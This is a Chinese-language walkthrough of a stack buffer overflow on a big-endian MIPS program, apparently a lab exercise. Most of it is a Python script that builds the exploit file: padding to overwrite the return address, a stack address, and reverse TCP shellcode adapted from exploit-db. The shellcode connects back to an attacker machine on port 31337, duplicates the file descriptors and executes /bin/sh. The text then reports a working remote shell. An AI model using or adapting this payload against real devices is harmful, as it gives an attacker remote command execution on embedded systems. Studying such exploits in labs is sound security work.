MIPS Reverse TCP Exploit Shellcode

首先还是先调试确定一下offset和sp值

在main函数的返回处设置断点

执行过来后，查看寄存器值，返回地址RA被覆盖为BBBB，此时栈帧指向0x7FFFEE98

可以设置将BBBB(RA)值覆盖为CCCC(SP)地址，即0x7FFFEE98

因为此程序是大端序的

在exploit-db中找到一个Big Endian的shellcode

参考链接 https://www.exploit-db.com/exploits/45541

这段代码默认是连接到192.168.2.157:31337端口

将IP地址修改为Kali机器地址 192.168.197.143，端口号不变

修改后的代码如下

#/usr/bin/env python

import struct
print '[*] prepare shellcode ',

shellcode = "A"*0x19C
shellcode += struct.pack(">L", 0x7FFFEE98) #SP address(PC)

shellcode += "\x24\x0f\xff\xfa"      # li      $t7, -6
shellcode += "\x01\xe0\x78\x27"      # nor     $t7, $zero
shellcode += "\x21\xe4\xff\xfd"      # addi    $a0, $t7, -3
shellcode += "\x21\xe5\xff\xfd"      # addi    $a1, $t7, -3
shellcode += "\x28\x06\xff\xff"      # slti    $a2, $zero, -1
shellcode += "\x24\x02\x10\x57"      # li      $v0, 4183 ( sys_socket )
shellcode += "\x01\x01\x01\x0c"      # syscall 0x40404
shellcode += "\xaf\xa2\xff\xff"      # sw      $v0, -1($sp)
shellcode += "\x8f\xa4\xff\xff"      # lw      $a0, -1($sp)
shellcode += "\x34\x0f\xff\xfd"      # li      $t7, -3 ( sa_family = AF_INET )
shellcode += "\x01\xe0\x78\x27"      # nor     $t7, $zero
shellcode += "\xaf\xaf\xff\xe0"      # sw      $t7, -0x20($sp)
# ================ You can change port here  ================= */
shellcode += "\x3c\x0e\x7a\x69"      # lui     $t6, 0x7a69 ( sin_port = 0x7a69 == 31337 )
# ============================================================ */

shellcode += "\x35\xce\x7a\x69"      # ori     $t6, $t6, 0x7a69 
shellcode += "\xaf\xae\xff\xe4"      # sw      $t6, -0x1c($sp)

# ================ You can change ip here  ================= */
shellcode += "\x3c\x0e\xc0\xa8"      # lui     $t6, 0xc0a8         ( sin_addr = 0xc0a8 == 192.168
shellcode += "\x35\xce\xc5\x8f"      # ori     $t6, $t6, 0xc58f                 0xc58f == 197.143
# ============================================================ */

shellcode += "\xaf\xae\xff\xe6"      # sw      $t6, -0x1a($sp)
shellcode += "\x27\xa5\xff\xe2"      # addiu   $a1, $sp, -0x1e
shellcode += "\x24\x0c\xff\xef"      # li      $t4, -17  ( addrlen = 16 )
shellcode += "\x01\x80\x30\x27"      # nor     $a2, $t4, $zero
shellcode += "\x24\x02\x10\x4a"      # li      $v0, 4170 ( sys_connect )
shellcode += "\x01\x01\x01\x0c"      # syscall 0x40404
shellcode += "\x24\x0f\xff\xfd"      # li      t7,-3
shellcode += "\x01\xe0\x28\x27"      # nor     a1,t7,zero
shellcode += "\x8f\xa4\xff\xff"      # lw      $a0, -1($sp)   
# dup2_loop:
shellcode += "\x24\x02\x0f\xdf"      # li      $v0, 4063 ( sys_dup2 )
shellcode += "\x01\x01\x01\x0c"      # syscall 0x40404
shellcode += "\x24\xa5\xff\xff"      # addi    a1,a1,-1 (\x20\xa5\xff\xff)
shellcode += "\x24\x01\xff\xff"      # li      at,-1
shellcode += "\x14\xa1\xff\xfb"      # bne     a1,at, dup2_loop
shellcode += "\x28\x06\xff\xff"      # slti    $a2, $zero, -1
shellcode += "\x3c\x0f\x2f\x2f"      # lui     $t7, 0x2f2f
shellcode += "\x35\xef\x62\x69"      # ori     $t7, $t7, 0x6269
shellcode += "\xaf\xaf\xff\xec"      # sw      $t7, -0x14($sp)
shellcode += "\x3c\x0e\x6e\x2f"      # lui     $t6, 0x6e2f
shellcode += "\x35\xce\x73\x68"      # ori     $t6, $t6, 0x7368
shellcode += "\xaf\xae\xff\xf0"      # sw      $t6, -0x10($sp)
shellcode += "\xaf\xa0\xff\xf4"      # sw      $zero, -0xc($sp)
shellcode += "\x27\xa4\xff\xec"      # addiu   $a0, $sp, -0x14
shellcode += "\xaf\xa4\xff\xf8"      # sw      $a0, -8($sp)
shellcode += "\xaf\xa0\xff\xfc"      # sw      $zero, -4($sp)
shellcode += "\x27\xa5\xff\xf8"      # addiu   $a1, $sp, -8
shellcode += "\x24\x02\x0f\xab"      # li      $v0, 4011 (sys_execve)
shellcode += "\x01\x01\x01\x0c"      # syscall 0x40404

print ' ok'

print '[+] create passwd file ',
fw = open('passwd','w')
fw.write(shellcode)
fw.close()
print ' ok'

执行此py程序，在Kali端开启端口监听，然后执行vuln_system函数，可以看到错误提示，并且程序中断下来，说明正在监听

在Kali端监听，虽然没有回显，但是已经可以执行命令了